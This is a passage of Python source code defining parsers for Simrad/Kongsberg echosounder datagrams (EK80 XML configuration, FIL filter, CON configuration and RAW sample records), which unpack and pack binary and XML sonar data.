struct.pack(datagram_fmt, *datagram_contents)\n\n\nclass SimradXMLParser(_SimradDatagramParser):\n \"\"\"\n EK80 XML datagram contains the following keys:\n\n\n type: string == 'XML0'\n low_date: long uint representing LSBytes of 64bit NT date\n high_date: long uint representing MSBytes of 64bit NT date\n timestamp: datetime.datetime object of NT date, assumed to be UTC\n subtype: string representing Simrad XML datagram type:\n configuration, environment, or parameter\n\n [subtype]: dict containing the data specific to the XML subtype.\n\n The following methods are defined:\n\n from_string(str): parse a raw EK80 XML datagram\n (with leading/trailing datagram size stripped)\n\n to_string(): Returns the datagram as a raw string\n (including leading/trailing size fields)\n ready for writing to disk\n \"\"\"\n\n # define the XML parsing options - here we define dictionaries for various xml datagram\n # types. When parsing that xml datagram, these dictionaries are used to inform the parser about\n # type conversion, name wrangling, and delimiter. If a field is missing, the parser\n # assumes no conversion: type will be string, default mangling, and that there is only 1\n # element.\n #\n # the dicts are in the form:\n # 'XMLParamName':[converted type,'fieldname', 'parse char']\n #\n # For example: 'PulseDurationFM':[float,'pulse_duration_fm',';']\n #\n # will result in a return dictionary field named 'pulse_duration_fm' that contains a list\n # of float values parsed from a string that uses ';' to separate values. Empty strings\n # for fieldname and/or parse char result in the default action for those parsing steps.\n\n channel_parsing_options = {\n \"MaxTxPowerTransceiver\": [int, \"\", \"\"],\n \"PulseDuration\": [float, \"\", \";\"],\n \"PulseDurationFM\": [float, \"pulse_duration_fm\", \";\"],\n \"SampleInterval\": [float, \"\", \";\"],\n \"ChannelID\": [str, \"channel_id\", \"\"],\n \"HWChannelConfiguration\": [str, \"hw_channel_configuration\", \"\"],\n }\n\n transceiver_parsing_options = {\n \"TransceiverNumber\": [int, \"\", \"\"],\n \"Version\": [str, \"transceiver_version\", \"\"],\n \"IPAddress\": [str, \"ip_address\", \"\"],\n \"Impedance\": [int, \"\", \"\"],\n }\n\n transducer_parsing_options = {\n \"SerialNumber\": [str, \"transducer_serial_number\", \"\"],\n \"Frequency\": [float, \"transducer_frequency\", \"\"],\n \"FrequencyMinimum\": [float, \"transducer_frequency_minimum\", \"\"],\n \"FrequencyMaximum\": [float, \"transducer_frequency_maximum\", \"\"],\n \"BeamType\": [int, \"transducer_beam_type\", \"\"],\n \"Gain\": [float, \"\", \";\"],\n \"SaCorrection\": [float, \"\", \";\"],\n \"MaxTxPowerTransducer\": [float, \"\", \"\"],\n \"EquivalentBeamAngle\": [float, \"\", \"\"],\n \"BeamWidthAlongship\": [float, \"\", \"\"],\n \"BeamWidthAthwartship\": [float, \"\", \"\"],\n \"AngleSensitivityAlongship\": [float, \"\", \"\"],\n \"AngleSensitivityAthwartship\": [float, \"\", \"\"],\n \"AngleOffsetAlongship\": [float, \"\", \"\"],\n \"AngleOffsetAthwartship\": [float, \"\", \"\"],\n \"DirectivityDropAt2XBeamWidth\": [\n float,\n \"directivity_drop_at_2x_beam_width\",\n \"\",\n ],\n \"TransducerOffsetX\": [float, \"\", \"\"],\n \"TransducerOffsetY\": [float, \"\", \"\"],\n \"TransducerOffsetZ\": [float, \"\", \"\"],\n \"TransducerAlphaX\": [float, \"\", \"\"],\n \"TransducerAlphaY\": [float, \"\", \"\"],\n \"TransducerAlphaZ\": [float, \"\", \"\"],\n }\n\n header_parsing_options = {\"Version\": [str, \"application_version\", \"\"]}\n\n envxdcr_parsing_options = {\"SoundSpeed\": [float, \"transducer_sound_speed\", \"\"]}\n\n environment_parsing_options = {\n \"Depth\": [float, \"\", \"\"],\n \"Acidity\": [float, \"\", \"\"],\n \"Salinity\": [float, \"\", \"\"],\n \"SoundSpeed\": [float, \"\", \"\"],\n \"Temperature\": [float, \"\", \"\"],\n \"Latitude\": [float, \"\", \"\"],\n \"SoundVelocityProfile\": [float, \"\", \";\"],\n \"DropKeelOffset\": [float, \"\", \"\"],\n \"DropKeelOffsetIsManual\": [int, \"\", \"\"],\n \"WaterLevelDraft\": [float, \"\", \"\"],\n \"WaterLevelDraftIsManual\": [int, \"\", \"\"],\n }\n\n parameter_parsing_options = {\n \"ChannelID\": [str, \"channel_id\", \"\"],\n \"ChannelMode\": [int, \"\", \"\"],\n \"PulseForm\": [int, \"\", \"\"],\n \"Frequency\": [float, \"\", \"\"],\n \"PulseDuration\": [float, \"\", \"\"],\n \"SampleInterval\": [float, \"\", \"\"],\n \"TransmitPower\": [float, \"\", \"\"],\n \"Slope\": [float, \"\", \"\"],\n }\n\n def __init__(self):\n headers = {0: [(\"type\", \"4s\"), (\"low_date\", \"L\"), (\"high_date\", \"L\")]}\n _SimradDatagramParser.__init__(self, \"XML\", headers)\n\n def _unpack_contents(self, raw_string, bytes_read, version):\n \"\"\"\n Parses the NMEA string provided in raw_string\n\n :param raw_string: Raw NMEA strin (i.e. '$GPZDA,160012.71,11,03,2004,-1,00*7D')\n :type raw_string: str\n\n :returns: None\n \"\"\"\n\n def from_CamelCase(xml_param):\n \"\"\"\n convert name from CamelCase to fit with existing naming convention by\n inserting an underscore before each capital and then lowering the caps\n e.g. CamelCase becomes camel_case.\n \"\"\"\n idx = list(reversed([i for i, c in enumerate(xml_param) if c.isupper()]))\n param_len = len(xml_param)\n for i in idx:\n # check if we should insert an underscore\n if i > 0 and i < param_len:\n xml_param = xml_param[:i] + \"_\" + xml_param[i:]\n xml_param = xml_param.lower()\n\n return xml_param\n\n def dict_to_dict(xml_dict, data_dict, parse_opts):\n \"\"\"\n dict_to_dict appends the ETree xml value dicts to a provided dictionary\n and along the way converts the key name to conform to the project's\n naming convention and optionally parses and or converts values as\n specified in the parse_opts dictionary.\n \"\"\"\n\n for k in xml_dict:\n # check if we're parsing this key/value\n if k in parse_opts:\n # try to parse the string\n if parse_opts[k][2]:\n try:\n data = xml_dict[k].split(parse_opts[k][2])\n except:\n # bad or empty parse chararacter(s) provided\n data = xml_dict[k]\n else:\n # no parse char provided - nothing to parse\n data = xml_dict[k]\n\n # try to convert to specified type\n if isinstance(data, list):\n for i in range(len(data)):\n try:\n data[i] = parse_opts[k][0](data[i])\n except:\n pass\n else:\n data = parse_opts[k][0](data)\n\n # and add the value to the provided dict\n if parse_opts[k][1]:\n # add using the specified key name\n data_dict[parse_opts[k][1]] = data\n else:\n # add using the default key name wrangling\n data_dict[from_CamelCase(k)] = data\n else:\n # nothing to do with the value string\n data = xml_dict[k]\n\n # add the parameter to the provided dictionary\n data_dict[from_CamelCase(k)] = data\n\n header_values = struct.unpack(\n self.header_fmt(version), raw_string[: self.header_size(version)]\n )\n data = {}\n\n for indx, field in enumerate(self.header_fields(version)):\n data[field] = header_values[indx]\n if isinstance(data[field], bytes):\n data[field] = data[field].decode()\n\n data[\"timestamp\"] = nt_to_unix((data[\"low_date\"], data[\"high_date\"]))\n data[\"bytes_read\"] = bytes_read\n\n if version == 0:\n if sys.version_info.major > 2:\n xml_string = str(\n raw_string[self.header_size(version) :].strip(b\"\\x00\"),\n \"ascii\",\n errors=\"replace\",\n )\n else:\n xml_string = unicode( # noqa\n raw_string[self.header_size(version) :].strip(\"\\x00\"),\n \"ascii\",\n errors=\"replace\",\n )\n\n # get the ElementTree element\n root = ET.fromstring(xml_string)\n\n # get the XML message type\n data[\"subtype\"] = root.tag.lower()\n\n # create the dictionary that contains the message data\n data[data[\"subtype\"]] = {}\n\n # parse it\n if data[\"subtype\"] == \"configuration\":\n\n # parse the Transceiver section\n for tcvr in root.iter(\"Transceiver\"):\n # parse the Transceiver section\n tcvr_xml = tcvr.attrib\n\n # parse the Channel section -- this works with multiple channels\n # under 1 transceiver\n for tcvr_ch in tcvr.iter(\"Channel\"):\n tcvr_ch_xml = tcvr_ch.attrib\n channel_id = tcvr_ch_xml[\"ChannelID\"]\n\n # create the configuration dict for this channel\n data[\"configuration\"][channel_id] = {}\n\n # add the transceiver data to the config dict (this is\n # replicated for all channels)\n dict_to_dict(\n tcvr_xml,\n data[\"configuration\"][channel_id],\n self.transceiver_parsing_options,\n )\n\n # add the general channel data to the config dict\n dict_to_dict(\n tcvr_ch_xml,\n data[\"configuration\"][channel_id],\n self.channel_parsing_options,\n )\n\n # check if there are >1 transducer under a single transceiver channel\n if len(list(tcvr_ch)) > 1:\n ValueError(\n \"Found >1 transducer under a single transceiver channel!\"\n )\n else: # should only have 1 transducer\n tcvr_ch_xducer = tcvr_ch.find(\n \"Transducer\"\n ) # get Element of this xducer\n f_par = tcvr_ch_xducer.findall(\"FrequencyPar\")\n # Save calibration parameters\n if f_par:\n cal_par = {\n \"frequency\": np.array(\n [int(f.attrib[\"Frequency\"]) for f in f_par]\n ),\n \"gain\": np.array(\n [float(f.attrib[\"Gain\"]) for f in f_par]\n ),\n \"impedance\": np.array(\n [int(f.attrib[\"Impedance\"]) for f in f_par]\n ),\n \"phase\": np.array(\n [float(f.attrib[\"Phase\"]) for f in f_par]\n ),\n \"beamwidth_alongship\": np.array(\n [\n float(f.attrib[\"BeamWidthAlongship\"])\n for f in f_par\n ]\n ),\n \"beamwidth_athwartship\": np.array(\n [\n float(f.attrib[\"BeamWidthAthwartship\"])\n for f in f_par\n ]\n ),\n \"angle_offset_alongship\": np.array(\n [\n float(f.attrib[\"AngleOffsetAlongship\"])\n for f in f_par\n ]\n ),\n \"angle_offset_athwartship\": np.array(\n [\n float(f.attrib[\"AngleOffsetAthwartship\"])\n for f in f_par\n ]\n ),\n }\n data[\"configuration\"][channel_id][\n \"calibration\"\n ] = cal_par\n # add the transducer data to the config dict\n dict_to_dict(\n tcvr_ch_xducer.attrib,\n data[\"configuration\"][channel_id],\n self.transducer_parsing_options,\n )\n\n # get unique transceiver channel number stored in channel_id\n tcvr_ch_num = TCVR_CH_NUM_MATCHER.search(channel_id)[0]\n\n # parse the Transducers section from the root\n # TODO Remove Transducers if doesnt exist\n xducer = root.find(\"Transducers\")\n if xducer is not None:\n # built occurrence lookup table for transducer name\n xducer_name_list = []\n for xducer_ch in xducer.iter(\"Transducer\"):\n xducer_name_list.append(\n xducer_ch.attrib[\"TransducerName\"]\n )\n\n # find matching transducer for this channel_id\n match_found = False\n for xducer_ch in xducer.iter(\"Transducer\"):\n if not match_found:\n xducer_ch_xml = xducer_ch.attrib\n match_name = (\n xducer_ch.attrib[\"TransducerName\"]\n == tcvr_ch_xducer.attrib[\"TransducerName\"]\n )\n if xducer_ch.attrib[\"TransducerSerialNumber\"] == \"\":\n match_sn = False\n else:\n match_sn = (\n xducer_ch.attrib[\"TransducerSerialNumber\"]\n == tcvr_ch_xducer.attrib[\"SerialNumber\"]\n )\n match_tcvr = (\n tcvr_ch_num\n in xducer_ch.attrib[\"TransducerCustomName\"]\n )\n\n # if find match add the transducer mounting details\n if (\n Counter(xducer_name_list)[\n xducer_ch.attrib[\"TransducerName\"]\n ]\n > 1\n ):\n # if more than one transducer has the same name\n # only check sn and transceiver unique number\n match_found = match_sn or match_tcvr\n else:\n match_found = (\n match_name or match_sn or match_tcvr\n )\n\n # add transducer mounting details\n if match_found:\n dict_to_dict(\n xducer_ch_xml,\n data[\"configuration\"][channel_id],\n self.transducer_parsing_options,\n )\n\n # add the header data to the config dict\n h = root.find(\"Header\")\n dict_to_dict(\n h.attrib,\n data[\"configuration\"][channel_id],\n self.header_parsing_options,\n )\n\n elif data[\"subtype\"] == \"parameter\":\n\n # parse the parameter XML datagram\n for h in root.iter(\"Channel\"):\n parm_xml = h.attrib\n # add the data to the environment dict\n dict_to_dict(\n parm_xml, data[\"parameter\"], self.parameter_parsing_options\n )\n\n elif data[\"subtype\"] == \"environment\":\n\n # parse the environment XML datagram\n for h in root.iter(\"Environment\"):\n env_xml = h.attrib\n # add the data to the environment dict\n dict_to_dict(\n env_xml, data[\"environment\"], self.environment_parsing_options\n )\n\n for h in root.iter(\"Transducer\"):\n transducer_xml = h.attrib\n # add the data to the environment dict\n dict_to_dict(\n transducer_xml,\n data[\"environment\"],\n self.envxdcr_parsing_options,\n )\n\n data[\"xml\"] = xml_string\n return data\n\n def _pack_contents(self, data, version):\n def to_CamelCase(xml_param):\n \"\"\"\n convert name from project's convention to CamelCase for converting back to\n XML to in Kongsberg's convention.\n \"\"\"\n idx = list(reversed([i for i, c in enumerate(xml_param) if c.isupper()]))\n param_len = len(xml_param)\n for i in idx:\n # check if we should insert an underscore\n if idx > 0 and idx < param_len - 1:\n xml_param = xml_param[:idx] + \"_\" + xml_param[idx:]\n xml_param = xml_param.lower()\n\n return xml_param\n\n datagram_fmt = self.header_fmt(version)\n datagram_contents = []\n\n if version == 0:\n\n for field in self.header_fields(version):\n datagram_contents.append(data[field])\n\n if data[\"nmea_string\"][-1] != \"\\x00\":\n tmp_string = data[\"nmea_string\"] + \"\\x00\"\n else:\n tmp_string = data[\"nmea_string\"]\n\n # Pad with more nulls to 4-byte word boundry if necessary\n if len(tmp_string) % 4:\n tmp_string += \"\\x00\" * (4 - (len(tmp_string) % 4))\n\n datagram_fmt += \"%ds\" % (len(tmp_string))\n\n # Convert to python string if needed\n if isinstance(tmp_string, str):\n tmp_string = tmp_string.encode(\"ascii\", errors=\"replace\")\n\n datagram_contents.append(tmp_string)\n\n return struct.pack(datagram_fmt, *datagram_contents)\n\n\nclass SimradFILParser(_SimradDatagramParser):\n \"\"\"\n EK80 FIL datagram contains the following keys:\n\n\n type: string == 'FIL1'\n low_date: long uint representing LSBytes of 64bit NT date\n high_date: long uint representing MSBytes of 64bit NT date\n timestamp: datetime.datetime object of NT date, assumed to be UTC\n stage: int\n channel_id: string\n n_coefficients: int\n decimation_factor: int\n coefficients: np.complex64\n\n The following methods are defined:\n\n from_string(str): parse a raw EK80 FIL datagram\n (with leading/trailing datagram size stripped)\n\n to_string(): Returns the datagram as a raw string\n (including leading/trailing size fields)\n ready for writing to disk\n \"\"\"\n\n def __init__(self):\n headers = {\n 1: [\n (\"type\", \"4s\"),\n (\"low_date\", \"L\"),\n (\"high_date\", \"L\"),\n (\"stage\", \"h\"),\n (\"spare\", \"2s\"),\n (\"channel_id\", \"128s\"),\n (\"n_coefficients\", \"h\"),\n (\"decimation_factor\", \"h\"),\n ]\n }\n\n _SimradDatagramParser.__init__(self, \"FIL\", headers)\n\n def _unpack_contents(self, raw_string, bytes_read, version):\n\n data = {}\n header_values = struct.unpack(\n self.header_fmt(version), raw_string[: self.header_size(version)]\n )\n\n for indx, field in enumerate(self.header_fields(version)):\n data[field] = header_values[indx]\n\n # handle Python 3 strings\n if (sys.version_info.major > 2) and isinstance(data[field], bytes):\n data[field] = data[field].decode(\"latin_1\")\n\n data[\"timestamp\"] = nt_to_unix((data[\"low_date\"], data[\"high_date\"]))\n data[\"bytes_read\"] = bytes_read\n\n if version == 1:\n # clean up the channel ID\n data[\"channel_id\"] = data[\"channel_id\"].strip(\"\\x00\")\n\n # unpack the coefficients\n indx = self.header_size(version)\n block_size = data[\"n_coefficients\"] * 8\n data[\"coefficients\"] = np.frombuffer(\n raw_string[indx : indx + block_size], dtype=\"complex64\" # noqa\n )\n\n return data\n\n def _pack_contents(self, data, version):\n\n datagram_fmt = self.header_fmt(version)\n datagram_contents = []\n\n if version == 0:\n\n pass\n\n elif version == 1:\n for field in self.header_fields(version):\n datagram_contents.append(data[field])\n\n datagram_fmt += \"%ds\" % (len(data[\"beam_config\"]))\n datagram_contents.append(data[\"beam_config\"])\n\n return struct.pack(datagram_fmt, *datagram_contents)\n\n\nclass SimradConfigParser(_SimradDatagramParser):\n \"\"\"\n Simrad Configuration Datagram parser operates on dictionaries with the following keys:\n\n type: string == 'CON0'\n low_date: long uint representing LSBytes of 64bit NT date\n high_date: long uint representing MSBytes of 64bit NT date\n timestamp: datetime.datetime object of NT date, assumed to be UTC\n\n survey_name [str]\n transect_name [str]\n sounder_name [str]\n version [str]\n spare0 [str]\n transceiver_count [long]\n transceivers [list] List of dicts representing Transducer Configs:\n\n ME70 Data contains the following additional values (data contained w/in first 14\n bytes of the spare0 field)\n\n multiplexing [short] Always 0\n time_bias [long] difference between UTC and local time in min.\n sound_velocity_avg [float] [m/s]\n sound_velocity_transducer [float] [m/s]\n beam_config [str] Raw XML string containing beam config. info\n\n\n Transducer Config Keys (ER60/ES60/ES70 sounders):\n channel_id [str] channel ident string\n beam_type [long] Type of channel (0 = Single, 1 = Split)\n frequency [float] channel frequency\n equivalent_beam_angle [float] dB\n beamwidth_alongship [float]\n beamwidth_athwartship [float]\n angle_sensitivity_alongship [float]\n angle_sensitivity_athwartship [float]\n angle_offset_alongship [float]\n angle_offset_athwartship [float]\n pos_x [float]\n pos_y [float]\n pos_z [float]\n dir_x [float]\n dir_y [float]\n dir_z [float]\n pulse_length_table [float[5]]\n spare1 [str]\n gain_table [float[5]]\n spare2 [str]\n sa_correction_table [float[5]]\n spare3 [str]\n gpt_software_version [str]\n spare4 [str]\n\n Transducer Config Keys (ME70 sounders):\n channel_id [str] channel ident string\n beam_type [long] Type of channel (0 = Single, 1 = Split)\n reserved1 [float] channel frequency\n equivalent_beam_angle [float] dB\n beamwidth_alongship [float]\n beamwidth_athwartship [float]\n angle_sensitivity_alongship [float]\n angle_sensitivity_athwartship [float]\n angle_offset_alongship [float]\n angle_offset_athwartship [float]\n pos_x [float]\n pos_y [float]\n pos_z [float]\n beam_steering_angle_alongship [float]\n beam_steering_angle_athwartship [float]\n beam_steering_angle_unused [float]\n pulse_length [float]\n reserved2 [float]\n spare1 [str]\n gain [float]\n reserved3 [float]\n spare2 [str]\n sa_correction [float]\n reserved4 [float]\n spare3 [str]\n gpt_software_version [str]\n spare4 [str]\n\n from_string(str): parse a raw config datagram\n (with leading/trailing datagram size stripped)\n\n to_string(dict): Returns raw string (including leading/trailing size fields)\n ready for writing to disk\n \"\"\"\n\n COMMON_KEYS = [\n (\"channel_id\", \"128s\"),\n (\"beam_type\", \"l\"),\n (\"frequency\", \"f\"),\n (\"gain\", \"f\"),\n (\"equivalent_beam_angle\", \"f\"),\n (\"beamwidth_alongship\", \"f\"),\n (\"beamwidth_athwartship\", \"f\"),\n (\"angle_sensitivity_alongship\", \"f\"),\n (\"angle_sensitivity_athwartship\", \"f\"),\n (\"angle_offset_alongship\", \"f\"),\n (\"angle_offset_athwartship\", \"f\"),\n (\"pos_x\", \"f\"),\n (\"pos_y\", \"f\"),\n (\"pos_z\", \"f\"),\n (\"dir_x\", \"f\"),\n (\"dir_y\", \"f\"),\n (\"dir_z\", \"f\"),\n (\"pulse_length_table\", \"5f\"),\n (\"spare1\", \"8s\"),\n (\"gain_table\", \"5f\"),\n (\"spare2\", \"8s\"),\n (\"sa_correction_table\", \"5f\"),\n (\"spare3\", \"8s\"),\n (\"gpt_software_version\", \"16s\"),\n (\"spare4\", \"28s\"),\n ]\n\n def __init__(self):\n headers = {\n 0: [\n (\"type\", \"4s\"),\n (\"low_date\", \"L\"),\n (\"high_date\", \"L\"),\n (\"survey_name\", \"128s\"),\n (\"transect_name\", \"128s\"),\n (\"sounder_name\", \"128s\"),\n (\"version\", \"30s\"),\n (\"spare0\", \"98s\"),\n (\"transceiver_count\", \"l\"),\n ],\n 1: [(\"type\", \"4s\"), (\"low_date\", \"L\"), (\"high_date\", \"L\")],\n }\n\n _SimradDatagramParser.__init__(self, \"CON\", headers)\n\n self._transducer_headers = {\n \"ER60\": self.COMMON_KEYS,\n \"ES60\": self.COMMON_KEYS,\n \"ES70\": self.COMMON_KEYS,\n \"MBES\": [\n (\"channel_id\", \"128s\"),\n (\"beam_type\", \"l\"),\n (\"frequency\", \"f\"),\n (\"reserved1\", \"f\"),\n (\"equivalent_beam_angle\", \"f\"),\n (\"beamwidth_alongship\", \"f\"),\n (\"beamwidth_athwartship\", \"f\"),\n (\"angle_sensitivity_alongship\", \"f\"),\n (\"angle_sensitivity_athwartship\", \"f\"),\n (\"angle_offset_alongship\", \"f\"),\n (\"angle_offset_athwartship\", \"f\"),\n (\"pos_x\", \"f\"),\n (\"pos_y\", \"f\"),\n (\"pos_z\", \"f\"),\n (\"beam_steering_angle_alongship\", \"f\"),\n (\"beam_steering_angle_athwartship\", \"f\"),\n (\"beam_steering_angle_unused\", \"f\"),\n (\"pulse_length\", \"f\"),\n (\"reserved2\", \"f\"),\n (\"spare1\", \"20s\"),\n (\"gain\", \"f\"),\n (\"reserved3\", \"f\"),\n (\"spare2\", \"20s\"),\n (\"sa_correction\", \"f\"),\n (\"reserved4\", \"f\"),\n (\"spare3\", \"20s\"),\n (\"gpt_software_version\", \"16s\"),\n (\"spare4\", \"28s\"),\n ],\n }\n\n def _unpack_contents(self, raw_string, bytes_read, version):\n\n data = {}\n round6 = lambda x: round(x, ndigits=6) # noqa\n header_values = struct.unpack(\n self.header_fmt(version), raw_string[: self.header_size(version)]\n )\n\n for indx, field in enumerate(self.header_fields(version)):\n data[field] = header_values[indx]\n\n # handle Python 3 strings\n if (sys.version_info.major > 2) and isinstance(data[field], bytes):\n data[field] = data[field].decode(\"latin_1\")\n\n data[\"timestamp\"] = nt_to_unix((data[\"low_date\"], data[\"high_date\"]))\n data[\"bytes_read\"] = bytes_read\n\n if version == 0:\n\n data[\"transceivers\"] = {}\n\n for field in [\"transect_name\", \"version\", \"survey_name\", \"sounder_name\"]:\n data[field] = data[field].strip(\"\\x00\")\n\n sounder_name = data[\"sounder_name\"]\n if sounder_name == \"MBES\":\n _me70_extra_values = struct.unpack(\"=hLff\", data[\"spare0\"][:14])\n data[\"multiplexing\"] = _me70_extra_values[0]\n data[\"time_bias\"] = _me70_extra_values[1]\n data[\"sound_velocity_avg\"] = _me70_extra_values[2]\n data[\"sound_velocity_transducer\"] = _me70_extra_values[3]\n data[\"spare0\"] = data[\"spare0\"][:14] + data[\"spare0\"][14:].strip(\"\\x00\")\n\n else:\n data[\"spare0\"] = data[\"spare0\"].strip(\"\\x00\")\n\n buf_indx = self.header_size(version)\n\n try:\n transducer_header = self._transducer_headers[sounder_name]\n _sounder_name_used = sounder_name\n except KeyError:\n log.warning(\n \"Unknown sounder_name: %s, (no one of %s)\",\n sounder_name,\n list(self._transducer_headers.keys()),\n )\n log.warning(\"Will use ER60 transducer config fields as default\")\n\n transducer_header = self._transducer_headers[\"ER60\"]\n _sounder_name_used = \"ER60\"\n\n txcvr_header_fields = [x[0] for x in transducer_header]\n txcvr_header_fmt = \"=\" + \"\".join([x[1] for x in transducer_header])\n txcvr_header_size = struct.calcsize(txcvr_header_fmt)\n\n for txcvr_indx in range(1, data[\"transceiver_count\"] + 1):\n txcvr_header_values_encoded = struct.unpack(\n txcvr_header_fmt,\n raw_string[buf_indx : buf_indx + txcvr_header_size], # noqa\n )\n txcvr_header_values = list(txcvr_header_values_encoded)\n for tx_idx, tx_val in enumerate(txcvr_header_values_encoded):\n if isinstance(tx_val, bytes):\n txcvr_header_values[tx_idx] = tx_val.decode(\"latin_1\")\n\n txcvr = data[\"transceivers\"].setdefault(txcvr_indx, {})\n\n if _sounder_name_used in [\"ER60\", \"ES60\", \"ES70\"]:\n for txcvr_field_indx, field in enumerate(txcvr_header_fields[:17]):\n txcvr[field] = txcvr_header_values[txcvr_field_indx]\n\n txcvr[\"pulse_length_table\"] = np.fromiter(\n list(map(round6, txcvr_header_values[17:22])), \"float\"\n )\n txcvr[\"spare1\"] = txcvr_header_values[22]\n txcvr[\"gain_table\"] = np.fromiter(\n list(map(round6, txcvr_header_values[23:28])), \"float\"\n )\n txcvr[\"spare2\"] = txcvr_header_values[28]\n txcvr[\"sa_correction_table\"] = np.fromiter(\n list(map(round6, txcvr_header_values[29:34])), \"float\"\n )\n txcvr[\"spare3\"] = txcvr_header_values[34]\n txcvr[\"gpt_software_version\"] = txcvr_header_values[35]\n txcvr[\"spare4\"] = txcvr_header_values[36]\n\n elif _sounder_name_used == \"MBES\":\n for txcvr_field_indx, field in enumerate(txcvr_header_fields):\n txcvr[field] = txcvr_header_values[txcvr_field_indx]\n\n else:\n raise RuntimeError(\n \"Unknown _sounder_name_used (Should not happen, this is a bug!)\"\n )\n\n txcvr[\"channel_id\"] = txcvr[\"channel_id\"].strip(\"\\x00\")\n txcvr[\"spare1\"] = txcvr[\"spare1\"].strip(\"\\x00\")\n txcvr[\"spare2\"] = txcvr[\"spare2\"].strip(\"\\x00\")\n txcvr[\"spare3\"] = txcvr[\"spare3\"].strip(\"\\x00\")\n txcvr[\"spare4\"] = txcvr[\"spare4\"].strip(\"\\x00\")\n txcvr[\"gpt_software_version\"] = txcvr[\"gpt_software_version\"].strip(\n \"\\x00\"\n )\n\n buf_indx += txcvr_header_size\n\n elif version == 1:\n # CON1 only has a single data field: beam_config, holding an xml string\n data[\"beam_config\"] = raw_string[self.header_size(version) :].strip(\"\\x00\")\n\n return data\n\n def _pack_contents(self, data, version):\n\n datagram_fmt = self.header_fmt(version)\n datagram_contents = []\n\n if version == 0:\n\n if data[\"transceiver_count\"] != len(data[\"transceivers\"]):\n log.warning(\n \"Mismatch between 'transceiver_count' and actual # of transceivers\"\n )\n data[\"transceiver_count\"] = len(data[\"transceivers\"])\n\n sounder_name = data[\"sounder_name\"]\n if sounder_name == \"MBES\":\n _packed_me70_values = struct.pack(\n \"=hLff\",\n data[\"multiplexing\"],\n data[\"time_bias\"],\n data[\"sound_velocity_avg\"],\n data[\"sound_velocity_transducer\"],\n )\n data[\"spare0\"] = _packed_me70_values + data[\"spare0\"][14:]\n\n for field in self.header_fields(version):\n datagram_contents.append(data[field])\n\n try:\n transducer_header = self._transducer_headers[sounder_name]\n _sounder_name_used = sounder_name\n except KeyError:\n log.warning(\n \"Unknown sounder_name: %s, (no one of %s)\",\n sounder_name,\n list(self._transducer_headers.keys()),\n )\n log.warning(\"Will use ER60 transducer config fields as default\")\n\n transducer_header = self._transducer_headers[\"ER60\"]\n _sounder_name_used = \"ER60\"\n\n txcvr_header_fields = [x[0] for x in transducer_header]\n txcvr_header_fmt = \"=\" + \"\".join([x[1] for x in transducer_header])\n txcvr_header_size = struct.calcsize(txcvr_header_fmt) # noqa\n\n for txcvr_indx, txcvr in list(data[\"transceivers\"].items()):\n txcvr_contents = []\n\n if _sounder_name_used in [\"ER60\", \"ES60\", \"ES70\"]:\n for field in txcvr_header_fields[:17]:\n txcvr_contents.append(txcvr[field])\n\n txcvr_contents.extend(txcvr[\"pulse_length_table\"])\n txcvr_contents.append(txcvr[\"spare1\"])\n\n txcvr_contents.extend(txcvr[\"gain_table\"])\n txcvr_contents.append(txcvr[\"spare2\"])\n\n txcvr_contents.extend(txcvr[\"sa_correction_table\"])\n txcvr_contents.append(txcvr[\"spare3\"])\n\n txcvr_contents.extend(\n [txcvr[\"gpt_software_version\"], txcvr[\"spare4\"]]\n )\n\n txcvr_contents_str = struct.pack(txcvr_header_fmt, *txcvr_contents)\n\n elif _sounder_name_used == \"MBES\":\n for field in txcvr_header_fields:\n txcvr_contents.append(txcvr[field])\n\n txcvr_contents_str = struct.pack(txcvr_header_fmt, *txcvr_contents)\n\n else:\n raise RuntimeError(\n \"Unknown _sounder_name_used (Should not happen, this is a bug!)\"\n )\n\n datagram_fmt += \"%ds\" % (len(txcvr_contents_str))\n datagram_contents.append(txcvr_contents_str)\n\n elif version == 1:\n for field in self.header_fields(version):\n datagram_contents.append(data[field])\n\n datagram_fmt += \"%ds\" % (len(data[\"beam_config\"]))\n datagram_contents.append(data[\"beam_config\"])\n\n return struct.pack(datagram_fmt, *datagram_contents)\n\n\nclass SimradRawParser(_SimradDatagramParser):\n \"\"\"\n Sample Data Datagram parser operates on dictonaries with the following keys:\n\n type: string == 'RAW0'\n low_date: long uint representing LSBytes of 64bit NT date\n high_date: long uint representing MSBytes of 64bit NT date\n timestamp: datetime.datetime object of NT date, assumed to be UTC\n\n channel [short] Channel number\n mode [short] 1 = Power only, 2 = Angle only 3 = Power & Angle\n transducer_depth [float]\n frequency [float]\n transmit_power [float]\n pulse_length [float]\n bandwidth [float]\n sample_interval [float]\n sound_velocity [float]\n absorption_coefficient [float]\n heave [float]\n roll [float]\n pitch [float]\n temperature [float]\n heading [float]\n transmit_mode [short] 0 = Active, 1 = Passive, 2 = Test, -1 = Unknown\n spare0 [str]\n offset [long]\n count [long]\n\n power [numpy array] Unconverted power values (if present)\n angle [numpy array] Unconverted angle values (if present)\n\n from_string(str): parse a raw sample datagram\n (with leading/trailing datagram size stripped)\n\n to_string(dict): Returns raw string (including leading/trailing size fields)\n ready for writing to disk\n \"\"\"\n\n def __init__(self):\n headers = {\n 0: [\n (\"type\", \"4s\"),\n (\"low_date\", \"L\"),\n (\"high_date\", \"L\"),\n (\"channel\", \"h\"),\n (\"mode\", \"h\"),\n (\"transducer_depth\", \"f\"),\n (\"frequency\", \"f\"),\n (\"transmit_power\", \"f\"),\n (\"pulse_length\", \"f\"),\n (\"bandwidth\", \"f\"),\n (\"sample_interval\", \"f\"),\n (\"sound_velocity\", \"f\"),\n (\"absorption_coefficient\", \"f\"),\n (\"heave\", \"f\"),\n (\"roll\", \"f\"),\n (\"pitch\", \"f\"),\n (\"temperature\", \"f\"),\n (\"heading\", \"f\"),\n (\"transmit_mode\", \"h\"),\n (\"spare0\", \"6s\"),\n (\"offset\", \"l\"),\n (\"count\", \"l\"),\n ],\n 3: [\n (\"type\", \"4s\"),\n (\"low_date\", \"L\"),\n (\"high_date\", \"L\"),\n (\"channel_id\", \"128s\"),\n (\"data_type\", \"h\"),\n (\"spare\", \"2s\"),\n (\"offset\", \"l\"),\n (\"count\", \"l\"),\n ],\n }\n _SimradDatagramParser.__init__(self, \"RAW\", headers)\n\n def _unpack_contents(self, raw_string, bytes_read, version):\n\n header_values = struct.unpack(\n self.header_fmt(version), raw_string[: self.header_size(version)]\n )\n\n data = {}\n\n for indx, field in enumerate(self.header_fields(version)):\n data[field] = header_values[indx]\n if isinstance(data[field], bytes):\n data[field] = data[field].decode()\n\n data[\"timestamp\"] = nt_to_unix((data[\"low_date\"], data[\"high_date\"]))\n data[\"bytes_read\"] = 